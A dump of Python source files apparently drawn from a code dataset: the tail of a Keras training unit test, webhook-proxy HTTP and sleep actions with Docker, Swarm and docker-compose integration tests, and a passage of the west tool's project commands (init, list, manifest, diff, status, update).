model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
except Exception as e:
self.assertTrue(mock_fit.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
@patch("tensorflow.keras.models.Model.fit", side_effect=KeyboardInterrupt)
def test_throw_exception_on_fit_with_generator(self, mock_fit):
self.__hyperparameters.epochs = 3
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with h5py.File(self.__training_dump, "r") as hf:
try:
network.fit_with_generator(
hf["train_data"],
hf["labels"],
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
except Exception as e:
self.assertTrue(mock_fit.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "JohnVillalovos/webhook-proxy",
"score": 3
} |
#### File: src/actions/action_http.py
```python
import json
import requests
from actions import Action, action
@action("http")
class HttpAction(Action):
def __init__(
self,
target,
method="POST",
headers=None,
body=None,
json=False,
fail_on_error=False,
output="HTTP {{ response.status_code }} : {{ response.content }}",
):
self.target = target
self.method = method
self.headers = headers
self.body = body
self.json = json
self.fail_on_error = fail_on_error
self.output_format = output
def _run(self):
headers = self._headers.copy()
if self.body and "Content-Length" not in headers:
headers["Content-Length"] = str(len(self.body))
response = requests.request(
self.method, self._target, headers=headers, data=self._body
)
if self.fail_on_error and response.status_code // 100 != 2:
self.error("HTTP call failed (HTTP %d)" % response.status_code)
print(self._render_with_template(self.output_format, response=response))
@property
def _target(self):
return self._render_with_template(self.target)
@property
def _headers(self):
headers = dict()
if self.headers:
for name, value in self.headers.items():
headers[name] = self._render_with_template(value)
return headers
@property
def _body(self):
if self.body:
if self.json:
return self._render_json(self.body)
else:
return self._render_with_template(self.body)
else:
return self.body
def _render_json(self, body):
return json.dumps(self._render_json_item(body))
def _render_json_item(self, item):
if isinstance(item, dict):
rendered = {}
for key, value in item.items():
rendered[key] = self._render_json_item(value)
return rendered
if isinstance(item, list):
return [self._render_json_item(x) for x in item]
return self._render_with_template(item).strip()
```
#### File: src/actions/action_sleep.py
```python
import time
from actions import Action, action
@action("sleep")
class SleepAction(Action):
def __init__(
self, seconds, output="Waiting {{ seconds }} seconds before continuing ..."
):
self.seconds = seconds
self.output_format = output
def _run(self):
seconds = float(self._render_with_template(str(self.seconds)))
print(self._render_with_template(self.output_format, seconds=seconds))
time.sleep(seconds)
```
#### File: webhook-proxy/tests/it_docker.py
```python
from integrationtest_helper import IntegrationTestBase
class DockerIntegrationTest(IntegrationTestBase):
def test_docker_info(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /info:
actions:
- docker:
$info:
output: 'version={{ result.ServerVersion }}'
"""
self.prepare_file("test-21.yml", config)
container = self.start_app_container("test-21.yml")
response = self.request("/info", data="none")
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("version=%s" % self.DIND_VERSION, output)
def test_list_containers(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/list:
actions:
- docker:
$containers:
$list:
filters:
name: '{{ request.json.name }}'
output: |
{% for container in result %}
- {{ container.id }}
{% endfor %}
"""
self.prepare_file("test-22.yml", config)
container = self.start_app_container("test-22.yml")
response = self.request("/docker/list", name=container.name)
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertEqual(output.strip().splitlines()[-1], "- %s" % container.id)
def test_run_container(self):
self.prepare_images("alpine")
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /run:
actions:
- docker:
$containers:
$run:
image: alpine
command: 'echo "Alpine says: {{ request.json.message }}"'
remove: true
"""
self.prepare_file("test-23.yml", config)
container = self.start_app_container("test-23.yml")
response = self.request("/run", message="testing")
self.assertEqual(response.status_code, 200)
response = self.request("/run", message="sample")
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("Alpine says: testing", output)
self.assertIn("Alpine says: sample", output)
def test_log_container_status(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /log/status:
actions:
- docker:
$containers:
$get:
container_id: '{{ request.json.target }}'
output: '{{ context.set("container", result) }}'
- log:
message: >
status={{ context.container.status }}
"""
self.prepare_file("test-24.yml", config)
container = self.start_app_container("test-24.yml")
response = self.request("/log/status", target=container.id)
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("status=running", output)
def test_restart_container(self):
self.prepare_images("alpine")
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/restart:
actions:
- docker:
$containers:
$run:
image: alpine
command: 'sh -c "echo \"{{ request.json.message }}\" && sleep 3600"'
detach: true
output: '{% set _ = context.set("target", result) %}'
- eval:
block: |
{{ context.target.restart(timeout=1) }}
{{ context.target.logs(stdout=true, stderr=false) }}
"""
self.prepare_file("test-25.yml", config)
container = self.start_app_container("test-25.yml")
response = self.request("/docker/restart", message="Starting...")
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("Starting...\nStarting...", output)
```
#### File: webhook-proxy/tests/it_docker_swarm.py
```python
import time
from integrationtest_helper import IntegrationTestBase
def skip_below_version(version):
def decorator(f):
def wrapper(self, *args, **kwargs):
if map(int, self.DIND_VERSION.split(".")) < map(int, version.split(".")):
self.skipTest(
reason="Skipping %s on version %s (< %s)"
% (f.__name__, self.DIND_VERSION, version)
)
else:
f(self, *args, **kwargs)
return wrapper
return decorator
class DockerSwarmIntegrationTest(IntegrationTestBase):
@classmethod
def setUpClass(cls):
super(DockerSwarmIntegrationTest, cls).setUpClass()
cls.prepare_images("alpine")
cls.dind_container.exec_run("docker swarm init")
def tearDown(self):
super(DockerSwarmIntegrationTest, self).tearDown()
for service in self.remote_client.services.list():
service.remove()
def test_list_services_using_docker_action(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/services/list:
actions:
- docker:
$services:
$list:
output: |
{% for service in result %}
s={{ service.name }}#{{ service.id }}
{% endfor %}
"""
self.prepare_file("test-41.yml", config)
service = self.remote_client.services.create(
"alpine",
name="sample-app",
command='sh -c "date +%s ; sleep 3600"',
stop_grace_period=1,
)
self.wait_for_service_start(service, num_tasks=1)
self.assertGreater(len(self.get_service_logs(service)), 0)
container = self.start_app_container("test-41.yml")
response = self.request("/docker/services/list", data="none")
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("s=%s#%s" % (service.name, service.id), output)
@skip_below_version("1.13")
def test_restart_service(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/swarm/restart:
actions:
- docker-swarm:
$restart:
service_id: '{{ request.json.service }}'
"""
self.prepare_file("test-42.yml", config)
service = self.remote_client.services.create(
"alpine",
name="sample-app",
command='sh -c "echo "Starting" ; sleep 3600"',
stop_grace_period=1,
)
self.wait_for_service_start(service, num_tasks=1)
logs = self.get_service_logs(service)
self.assertEqual(logs.count("Starting"), 1)
self.start_app_container("test-42.yml")
response = self.request("/docker/swarm/restart", service="sample-app")
self.assertEqual(response.status_code, 200)
self.wait_for_service_start(service, num_tasks=2)
logs = self.get_service_logs(service)
self.assertEqual(logs.count("Starting"), 2)
def test_scale_service(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/swarm/scale:
actions:
- docker-swarm:
$scale:
service_id: '{{ request.json.service }}'
replicas: '{{ request.json.replicas }}'
"""
self.prepare_file("test-43.yml", config)
service = self.remote_client.services.create(
"alpine",
name="sample-app",
command='sh -c "echo "Starting" ; sleep 3600"',
stop_grace_period=1,
)
self.wait_for_service_start(service, num_tasks=1)
self.assertEqual(len(service.tasks()), 1)
self.start_app_container("test-43.yml")
response = self.request("/docker/swarm/scale", service="sample-app", replicas=2)
self.assertEqual(response.status_code, 200)
self.wait_for_service_start(service, num_tasks=2)
self.assertGreaterEqual(
len(service.tasks(filters={"desired-state": "running"})), 2
)
def test_update_service(self):
config = """
server:
host: 0.0.0.0
port: 9001
endpoints:
- /docker/swarm/update:
actions:
- docker-swarm:
$update:
service_id: '{{ request.json.service }}'
command: '{{ request.json.command }}'
labels:
label_1: 'sample'
label_2: '{{ request.json.label }}'
"""
self.prepare_file("test-44.yml", config)
service = self.remote_client.services.create(
"alpine",
name="sample-app",
command='sh -c "echo "Starting" ; sleep 3600"',
stop_grace_period=1,
)
self.wait_for_service_start(service, num_tasks=1)
self.start_app_container("test-44.yml")
response = self.request(
"/docker/swarm/update",
service="sample-app",
command='sh -c "echo "Updated" ; sleep 300"',
label="testing",
)
self.assertEqual(response.status_code, 200)
self.wait_for_service_start(service, num_tasks=2)
service.reload()
self.assertEqual(
service.attrs.get("Spec").get("Labels", dict()).get("label_1"), "sample"
)
self.assertEqual(
service.attrs.get("Spec").get("Labels", dict()).get("label_2"), "testing"
)
logs = self.get_service_logs(service)
self.assertIn("Starting", logs)
self.assertIn("Updated", logs)
@staticmethod
def wait_for_service_start(service, num_tasks, max_wait=30):
for _ in range(max_wait * 2):
if len(service.tasks()) >= num_tasks:
tasks_to_run = service.tasks(filters={"desired-state": "running"})
if len(tasks_to_run) > 0 and all(
task["Status"]["State"] == "running" for task in tasks_to_run
):
break
time.sleep(0.5)
def get_service_logs(self, service, stdout=True, stderr=False):
logs = list()
for container in self.remote_client.containers.list(
all=True, filters={"name": service.name}
):
logs.extend(
"".join(
char for char in container.logs(stdout=stdout, stderr=stderr)
).splitlines()
)
return filter(len, map(lambda x: x.strip(), logs))
```
#### File: webhook-proxy/tests/it_import.py
```python
import os
from integrationtest_helper import IntegrationTestBase
class ImportIntegrationTest(IntegrationTestBase):
def test_import(self):
current_dir = os.path.dirname(__file__)
with open(os.path.join(current_dir, "imports/test1/action.py")) as action1:
self.prepare_file("extra_action_1.py", action1.read())
with open(os.path.join(current_dir, "imports/test2/action.py")) as action2:
self.prepare_file("extra_action_2.py", action2.read())
config = """
server:
host: 0.0.0.0
port: 9001
imports:
- /var/tmp/extra_action_1.py
- /var/tmp/extra_action_2.py
endpoints:
- /imports:
method: 'POST'
actions:
- test1:
action: test-1
- test2:
action: test-2
"""
self.prepare_file("test-61.yml", config)
container = self.start_app_container("test-61.yml")
response = self.request("/imports", test="test")
self.assertEqual(response.status_code, 200)
output = container.logs(stdout=True, stderr=False)
self.assertIn("action=test-1", output.strip())
self.assertIn("action=test-2", output.strip())
```
#### File: webhook-proxy/tests/test_docker_compose_action.py
```python
import os
import random
from unittest_helper import ActionTestBase
class DockerComposeActionTest(ActionTestBase):
def test_executions(self):
directory = "/tmp/compose_test_%s" % random.randint(1000, 9999)
os.makedirs(directory)
with open("%s/docker-compose.yml" % directory, "w") as composefile:
composefile.write(
"version: '2' \n"
"services: \n"
" cmps_one: \n"
" image: alpine \n"
" command: sleep 10 \n"
" stop_signal: KILL \n"
" cmps_two: \n"
" image: alpine \n"
" command: sleep 10 \n"
" stop_signal: KILL \n"
)
try:
output = self._invoke(
[
{
"docker-compose": {
"project_name": "testing",
"directory": directory,
"$up": {"detached": True},
"output": "Compose containers:\n"
"{% for container in result %}"
"-C- {{ container.name }}\n"
"{% endfor %}",
}
},
{
"docker-compose": {
"project_name": "testing",
"directory": directory,
"$down": {
"remove_image_type": False,
"include_volumes": True,
},
}
},
]
)
self.assertIn("-C- testing_cmps_one_1", output)
self.assertIn("-C- testing_cmps_two_1", output)
finally:
os.remove("%s/docker-compose.yml" % directory)
os.rmdir(directory)
``` |
{
"source": "JohnVillalovos/west",
"score": 2
} |
#### File: west/app/project.py
```python
import argparse
from functools import partial
import logging
import os
from os.path import abspath, relpath
from pathlib import PurePath, Path
import shutil
import shlex
import subprocess
import sys
import textwrap
from time import perf_counter
from urllib.parse import urlparse
from west.configuration import config, update_config
from west import log
from west import util
from west.commands import WestCommand, CommandError
from west.manifest import ImportFlag, Manifest, MANIFEST_PROJECT_INDEX, \
ManifestProject, _manifest_content_at, ManifestImportFailed, \
_ManifestImportDepth, ManifestVersionError, MalformedManifest
from west.manifest import is_group as is_project_group
from west.manifest import MANIFEST_REV_BRANCH as MANIFEST_REV
from west.manifest import QUAL_MANIFEST_REV_BRANCH as QUAL_MANIFEST_REV
from west.manifest import QUAL_REFS_WEST as QUAL_REFS
#
# Project-related or multi-repo commands, like "init", "update",
# "diff", etc.
#
class _ProjectCommand(WestCommand):
# Helper class which contains common code needed by various commands
# in this file.
def _parser(self, parser_adder, **kwargs):
# Create and return a "standard" parser.
kwargs['help'] = self.help
kwargs['description'] = self.description
kwargs['formatter_class'] = argparse.RawDescriptionHelpFormatter
return parser_adder.add_parser(self.name, **kwargs)
def _cloned_projects(self, args, only_active=False):
# Returns _projects(args.projects, only_cloned=True) if
# args.projects is not empty (i.e., explicitly given projects
# are required to be cloned). Otherwise, returns all cloned
# projects.
if args.projects:
ret = self._projects(args.projects, only_cloned=True)
else:
ret = [p for p in self.manifest.projects if p.is_cloned()]
if args.projects or not only_active:
return ret
return [p for p in ret if self.manifest.is_active(p)]
def _projects(self, ids, only_cloned=False):
try:
return self.manifest.get_projects(ids, only_cloned=only_cloned)
except ValueError as ve:
if len(ve.args) != 2:
raise # not directly raised by get_projects()
# Die with an error message on unknown or uncloned projects.
unknown, uncloned = ve.args
if unknown:
die_unknown(unknown)
elif only_cloned and uncloned:
s = 's' if len(uncloned) > 1 else ''
names = ' '.join(p.name for p in uncloned)
log.die(f'uncloned project{s}: {names}.\n'
' Hint: run "west update" and retry.')
else:
# Should never happen, but re-raise to fail fast and
# preserve a stack trace, to encourage a bug report.
raise
def _handle_failed(self, args, failed):
# Shared code for commands (like status, diff, update) that need
# to do the same thing to multiple projects, but collect
# and report errors if anything failed.
if not failed:
return
elif len(failed) < 20:
s = 's:' if len(failed) > 1 else ''
projects = ', '.join(f'{p.name}' for p in failed)
log.err(f'{self.name} failed for project{s} {projects}')
else:
log.err(f'{self.name} failed for multiple projects; see above')
raise CommandError(1)
def _setup_logging(self, args):
logger = logging.getLogger('west.manifest')
verbose = min(args.verbose, log.VERBOSE_EXTREME)
if verbose >= log.VERBOSE_NORMAL:
level = logging.DEBUG
else:
level = logging.INFO
logger.setLevel(level)
logger.addHandler(ProjectCommandLogHandler())
class Init(_ProjectCommand):
def __init__(self):
super().__init__(
'init',
'create a west workspace',
f'''\
Creates a west workspace.
With -l, creates a workspace around an existing local repository;
without -l, creates a workspace by cloning a manifest repository
by URL.
With -m, clones the repository at that URL and uses it as the
manifest repository. If --mr is not given, the remote's default
branch will be used, if it exists.
With neither, -m {MANIFEST_URL_DEFAULT} is assumed.
''',
requires_workspace=False)
def do_add_parser(self, parser_adder):
# We set a custom usage because there are two distinct ways
# to call this command, and the default usage generated by
# argparse doesn't make that very clear.
parser = self._parser(
parser_adder,
usage='''
%(prog)s [-m URL] [--mr REVISION] [--mf FILE] [directory]
%(prog)s -l [--mf FILE] directory
''')
# Remember to update the usage if you modify any arguments.
parser.add_argument('-m', '--manifest-url',
help='''manifest repository URL to clone;
cannot be combined with -l''')
parser.add_argument('--mr', '--manifest-rev', dest='manifest_rev',
help='''manifest revision to check out and use;
cannot be combined with -l''')
parser.add_argument('--mf', '--manifest-file', dest='manifest_file',
help='manifest file name to use')
parser.add_argument('-l', '--local', action='store_true',
help='''use "directory" as an existing local
manifest repository instead of cloning one from
MANIFEST_URL; .west is created next to "directory"
in this case, and manifest.path points at
"directory"''')
parser.add_argument(
'directory', nargs='?', default=None,
help='''with -l, the path to the local manifest repository;
without it, the directory to create the workspace in (defaulting
to the current working directory in this case)''')
return parser
def do_run(self, args, _):
if self.topdir:
zb = os.environ.get('ZEPHYR_BASE')
if zb:
msg = textwrap.dedent(f'''
Note:
In your environment, ZEPHYR_BASE is set to:
{zb}
This forces west to search for a workspace there.
Try unsetting ZEPHYR_BASE and re-running this command.''')
else:
msg = ''
self.die_already(self.topdir, msg)
if args.local and (args.manifest_url or args.manifest_rev):
log.die('-l cannot be combined with -m or --mr')
self.die_if_no_git()
self._setup_logging(args)
if args.local:
topdir = self.local(args)
else:
topdir = self.bootstrap(args)
log.banner(f'Initialized. Now run "west update" inside {topdir}.')
def die_already(self, where, also=None):
log.die(f'already initialized in {where}, aborting.{also or ""}')
def local(self, args) -> Path:
if args.manifest_rev is not None:
log.die('--mr cannot be used with -l')
# We need to resolve this to handle the case that args.directory
# is '.'. In that case, Path('.').parent is just Path('.') instead of
# Path('..').
#
# https://docs.python.org/3/library/pathlib.html#pathlib.PurePath.parent
manifest_dir = Path(args.directory or os.getcwd()).resolve()
manifest_filename = args.manifest_file or 'west.yml'
manifest_file = manifest_dir / manifest_filename
topdir = manifest_dir.parent
rel_manifest = manifest_dir.name
west_dir = topdir / WEST_DIR
if not manifest_file.is_file():
log.die(f'can\'t init: no {manifest_filename} found in '
f'{manifest_dir}')
log.banner('Initializing from existing manifest repository',
rel_manifest)
log.small_banner(f'Creating {west_dir} and local configuration file')
self.create(west_dir)
os.chdir(topdir)
update_config('manifest', 'path', os.fspath(rel_manifest))
update_config('manifest', 'file', manifest_filename, topdir=topdir)
return topdir
def bootstrap(self, args) -> Path:
topdir = Path(abspath(args.directory or os.getcwd()))
log.banner('Initializing in', topdir)
manifest_url = args.manifest_url or MANIFEST_URL_DEFAULT
if args.manifest_rev:
# This works with tags, too.
branch_opt = ['--branch', args.manifest_rev]
else:
branch_opt = []
west_dir = topdir / WEST_DIR
try:
already = util.west_topdir(topdir, fall_back=False)
self.die_already(already)
except util.WestNotFound:
pass
if not topdir.is_dir():
self.create(topdir, exist_ok=False)
# Clone the manifest repository into a temporary directory.
tempdir: Path = west_dir / 'manifest-tmp'
if tempdir.is_dir():
log.dbg('removing existing temporary manifest directory', tempdir)
shutil.rmtree(tempdir)
try:
log.small_banner(
f'Cloning manifest repository from {manifest_url}' +
(f', rev. {args.manifest_rev}' if args.manifest_rev else ''))
self.check_call(['git', 'clone'] + branch_opt +
[manifest_url, os.fspath(tempdir)])
except subprocess.CalledProcessError:
shutil.rmtree(tempdir, ignore_errors=True)
raise
# Verify the manifest file exists.
temp_manifest_filename = args.manifest_file or 'west.yml'
temp_manifest = tempdir / temp_manifest_filename
if not temp_manifest.is_file():
log.die(f'can\'t init: no {temp_manifest_filename} found in '
f'{tempdir}\n'
f' Hint: check --manifest-url={manifest_url}' +
(f' and --manifest-rev={args.manifest_rev}'
if args.manifest_rev else '') +
f' You may need to remove {west_dir} before retrying.')
# Parse the manifest to get the manifest path, if it declares one.
# Otherwise, use the URL. Ignore imports -- all we really
# want to know is if there's a "self: path:" or not.
projects = Manifest.from_file(temp_manifest,
import_flags=ImportFlag.IGNORE,
topdir=topdir).projects
manifest_project = projects[MANIFEST_PROJECT_INDEX]
if manifest_project.path:
manifest_path = manifest_project.path
else:
# We use PurePath() here in case manifest_url is a
# windows-style path. That does the right thing in that
# case, without affecting POSIX platforms, where PurePath
# is PurePosixPath.
manifest_path = PurePath(urlparse(manifest_url).path).name
manifest_abspath = topdir / manifest_path
log.dbg('moving', tempdir, 'to', manifest_abspath,
level=log.VERBOSE_EXTREME)
manifest_abspath.parent.mkdir(parents=True, exist_ok=True)
try:
shutil.move(os.fspath(tempdir), os.fspath(manifest_abspath))
except shutil.Error as e:
log.die(e)
log.small_banner('setting manifest.path to', manifest_path)
update_config('manifest', 'path', manifest_path, topdir=topdir)
update_config('manifest', 'file', temp_manifest_filename,
topdir=topdir)
return topdir
def create(self, directory: Path, exist_ok: bool = True) -> None:
try:
directory.mkdir(parents=True, exist_ok=exist_ok)
except PermissionError:
log.die(f'Cannot initialize in {directory}: permission denied')
except FileExistsError:
log.die(f'Cannot initialize in {directory}: it already exists')
except Exception as e:
log.die(f"Can't create {directory}: {e}")
class List(_ProjectCommand):
def __init__(self):
super().__init__(
'list',
'print information about projects',
textwrap.dedent('''\
Print information about projects in the west manifest,
using format strings.'''))
def do_add_parser(self, parser_adder):
default_fmt = '{name:12} {path:28} {revision:40} {url}'
parser = self._parser(
parser_adder,
epilog=f'''\
{ACTIVE_PROJECTS_HELP}
FORMAT STRINGS
--------------
Projects are listed using a Python 3 format string. Arguments
to the format string are accessed by name.
The default format string is:
"{default_fmt}"
The following arguments are available:
- name: project name in the manifest
- url: full remote URL as specified by the manifest
- path: the relative path to the project from the top level,
as specified in the manifest where applicable
- abspath: absolute and normalized path to the project
- posixpath: like abspath, but in posix style, that is, with '/'
as the separator character instead of '\\'
- revision: project's revision as it appears in the manifest
- sha: project's revision as a SHA. Note that use of this requires
that the project has been cloned.
- cloned: "cloned" if the project has been cloned, "not-cloned"
otherwise
- clone_depth: project clone depth if specified, "None" otherwise
- groups: project groups, as a comma-separated list
''')
parser.add_argument('-a', '--all', action='store_true',
help='include inactive projects'),
parser.add_argument('--manifest-path-from-yaml', action='store_true',
help='''print the manifest repository's path
according to the manifest file YAML, which may
disagree with the manifest.path configuration
option'''),
parser.add_argument('-f', '--format', default=default_fmt,
help='''format string to use to list each
project; see FORMAT STRINGS below.''')
parser.add_argument('projects', metavar='PROJECT', nargs='*',
help='''projects (by name or path) to operate on;
see ACTIVE PROJECTS below''')
return parser
def do_run(self, args, user_args):
def sha_thunk(project):
self.die_if_no_git()
if not project.is_cloned():
log.die(f'cannot get sha for uncloned project {project.name}; '
f'run "west update {project.name}" and retry')
elif isinstance(project, ManifestProject):
return f'{"N/A":40}'
else:
return project.sha(MANIFEST_REV)
def cloned_thunk(project):
self.die_if_no_git()
return "cloned" if project.is_cloned() else "not-cloned"
def delay(func, project):
return DelayFormat(partial(func, project))
self._setup_logging(args)
for project in self._projects(args.projects):
# Skip inactive projects unless the user said
# --all or named some projects explicitly.
if not (args.all or args.projects or
self.manifest.is_active(project)):
log.dbg(f'{project.name}: skipping inactive project')
continue
# Spelling out the format keys explicitly here gives us
# future-proofing if the internal Project representation
# ever changes.
#
# Using DelayFormat delays computing derived values, such
# as SHAs, unless they are specifically requested, and then
# ensures they are only computed once.
try:
if (isinstance(project, ManifestProject) and not
args.manifest_path_from_yaml):
# Special-case the manifest repository while it's
# still showing up in the 'projects' list. Yet
# more evidence we should tackle #327.
path = config.get('manifest', 'path')
apath = abspath(os.path.join(self.topdir, path))
ppath = Path(apath).as_posix()
else:
path = project.path
apath = project.abspath
ppath = project.posixpath
result = args.format.format(
name=project.name,
url=project.url or 'N/A',
path=path,
abspath=apath,
posixpath=ppath,
revision=project.revision or 'N/A',
clone_depth=project.clone_depth or "None",
cloned=delay(cloned_thunk, project),
sha=delay(sha_thunk, project),
groups=','.join(project.groups))
except KeyError as e:
# The raised KeyError seems to just put the first
# invalid argument in the args tuple, regardless of
# how many unrecognizable keys there were.
log.die(f'unknown key "{e.args[0]}" in format string '
f'{shlex.quote(args.format)}')
except IndexError:
self.parser.print_usage()
log.die(f'invalid format string {shlex.quote(args.format)}')
except subprocess.CalledProcessError:
log.die(f'subprocess failed while listing {project.name}')
log.inf(result, colorize=False)
class ManifestCommand(_ProjectCommand):
# The slightly weird naming is to avoid a conflict with
# west.manifest.Manifest.
def __init__(self):
super(ManifestCommand, self).__init__(
'manifest',
'manage the west manifest',
textwrap.dedent('''\
Manages the west manifest.
The following actions are available. You must give exactly one.
- --resolve: print the current manifest with all imports applied,
as an equivalent single manifest file. Any imported manifests
must be cloned locally (with "west update").
- --freeze: like --resolve, but with all project revisions
converted to their current SHAs, based on the latest manifest-rev
branches. All projects must be cloned (with "west update").
- --validate: print an error and exit the process unsuccessfully
if the current manifest cannot be successfully parsed.
If the manifest can be parsed, print nothing and exit
successfully.
- --path: print the path to the top level manifest file.
If this file uses imports, it will not contain all the
manifest data.
If the manifest file does not use imports, and all project
revisions are SHAs, the --freeze and --resolve output will
be identical after a "west update".
'''),
accepts_unknown_args=False)
def do_add_parser(self, parser_adder):
parser = self._parser(parser_adder)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--resolve', action='store_true',
help='print the manifest with all imports resolved')
group.add_argument('--freeze', action='store_true',
help='''print the resolved manifest with SHAs for
all project revisions''')
group.add_argument('--validate', action='store_true',
help='''validate the current manifest,
exiting with an error if there are issues''')
group.add_argument('--path', action='store_true',
help="print the top level manifest file's path")
group = parser.add_argument_group('options for --resolve and --freeze')
group.add_argument('-o', '--out',
help='output file, default is standard output')
return parser
def do_run(self, args, user_args):
self._setup_logging(args)
# Since the user is explicitly managing the manifest, we are
# deliberately loading it again instead of using self.manifest
# to emit debug logs if enabled, which are turned off when the
# manifest is initially parsed in main.py.
#
# The code in main.py is usually responsible for handling any
# errors and printing useful messages. We re-do error checking
# for manifest-related errors that it won't handle.
try:
manifest = Manifest.from_file(topdir=self.topdir)
except _ManifestImportDepth:
log.die("cannot resolve manifest -- is there a loop?")
except ManifestImportFailed as mif:
log.die(f"manifest import failed\n Project: {mif.project}\n "
f"File: {mif.filename}")
except (MalformedManifest, ManifestVersionError) as e:
log.die('\n '.join(str(arg) for arg in e.args))
dump_kwargs = {'default_flow_style': False,
'sort_keys': False}
if args.validate:
pass # nothing more to do
elif args.resolve:
self._dump(args, manifest.as_yaml(**dump_kwargs))
elif args.freeze:
self._dump(args, manifest.as_frozen_yaml(**dump_kwargs))
elif args.path:
log.inf(manifest.path)
else:
# Can't happen.
raise RuntimeError(f'internal error: unhandled args {args}')
def _dump(self, args, to_dump):
if args.out:
with open(args.out, 'w') as f:
f.write(to_dump)
else:
sys.stdout.write(to_dump)
class Diff(_ProjectCommand):
def __init__(self):
super().__init__(
'diff',
'"git diff" for one or more projects',
'Runs "git diff" on each of the specified projects.')
def do_add_parser(self, parser_adder):
parser = self._parser(parser_adder,
epilog=ACTIVE_CLONED_PROJECTS_HELP)
parser.add_argument('projects', metavar='PROJECT', nargs='*',
help='''projects (by name or path) to operate on;
defaults to active cloned projects''')
parser.add_argument('-a', '--all', action='store_true',
help='include output for inactive projects')
return parser
def do_run(self, args, ignored):
self.die_if_no_git()
self._setup_logging(args)
failed = []
no_diff = 0
# We may need to force git to use colors if the user wants them,
# which it won't do ordinarily since stdout is not a terminal.
color = ['--color=always'] if log.use_color() else []
for project in self._cloned_projects(args, only_active=not args.all):
# Use paths that are relative to the base directory to make it
# easier to see where the changes are
cp = project.git(['diff', f'--src-prefix={project.path}/',
f'--dst-prefix={project.path}/',
'--exit-code'] + color,
capture_stdout=True, capture_stderr=True,
check=False)
if cp.returncode == 0:
no_diff += 1
if cp.returncode == 1 or log.VERBOSE > log.VERBOSE_NONE:
log.banner(f'diff for {project.name_and_path}:')
log.inf(cp.stdout.decode('utf-8'))
elif cp.returncode:
failed.append(project)
if failed:
self._handle_failed(args, failed)
elif log.VERBOSE <= log.VERBOSE_NONE:
log.inf(f"Empty diff in {no_diff} projects.")
class Status(_ProjectCommand):
def __init__(self):
super().__init__(
'status',
'"git status" for one or more projects',
"Runs 'git status' for each of the specified projects.")
def do_add_parser(self, parser_adder):
parser = self._parser(parser_adder,
epilog=ACTIVE_CLONED_PROJECTS_HELP)
parser.add_argument('projects', metavar='PROJECT', nargs='*',
help='''projects (by name or path) to operate on;
defaults to active cloned projects''')
parser.add_argument('-a', '--all', action='store_true',
help='include output for inactive projects')
return parser
def do_run(self, args, user_args):
self.die_if_no_git()
self._setup_logging(args)
failed = []
for project in self._cloned_projects(args, only_active=not args.all):
# 'git status' output for all projects is noisy when there
# are lots of projects.
#
# We avoid this problem in 2 steps:
#
# 1. Check if we need to print any output for the
# project.
#
# 2. If so, run 'git status' on the project. Otherwise,
# skip output for the project entirely.
#
# In verbose mode, we always print output.
try:
if not (log.VERBOSE or self.should_print_for(project)):
continue
log.banner(f'status of {project.name_and_path}:')
project.git('status', extra_args=user_args)
except subprocess.CalledProcessError:
failed.append(project)
self._handle_failed(args, failed)
def should_print_for(self, project):
# do_run() helper; check if the project has any status output
# to print. We manually use Popen in order to try to exit as
# quickly as possible if 'git status' prints anything.
# This technique fails when tested on Python 3.6, which west
# still supports at time of writing. This seems likely to be
# due to https://bugs.python.org/issue35182.
#
# Users of old python versions will have to deal with the
# verbose output.
if sys.version_info < (3, 7):
return True
popen = subprocess.Popen(['git', 'status', '--porcelain'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=project.abspath)
def has_output():
# 'git status --porcelain' prints nothing if there
# are no notable changes, so any output at all
# means we should run 'git status' on the project.
stdout, stderr = None, None
try:
stdout, stderr = popen.communicate(timeout=0.1)
except subprocess.TimeoutExpired:
pass
except ValueError:
# In case this isn't issue35182, handle the exception
# anyway.
log.wrn(
f'{project.name}: internal error; got ValueError '
'from Popen.communicate() when checking status. '
'Ignoring it, but please report this to the west '
'developers.')
return True
return stdout or stderr
while True:
if has_output():
popen.kill()
return True
if popen.poll() is not None:
break
return has_output()
class Update(_ProjectCommand):
def __init__(self):
super().__init__(
'update',
'update projects described in west manifest',
textwrap.dedent('''\
Updates active projects defined in the manifest file as follows:
1. Clone the project if necessary
2. If necessary, fetch the project's revision from its remote
(see "fetching behavior" below)
3. Reset the manifest-rev branch to the current manifest revision
4. Check out the new manifest-rev commit as a detached
HEAD (the default), or keep/rebase existing checked out branches
(see "checked out branch behavior")
You must have already created a west workspace with "west init".
This command does not alter the manifest repository's contents.''')
)
def do_add_parser(self, parser_adder):
parser = self._parser(parser_adder)
parser.add_argument('--stats', action='store_true',
help='''print performance statistics for
update operations''')
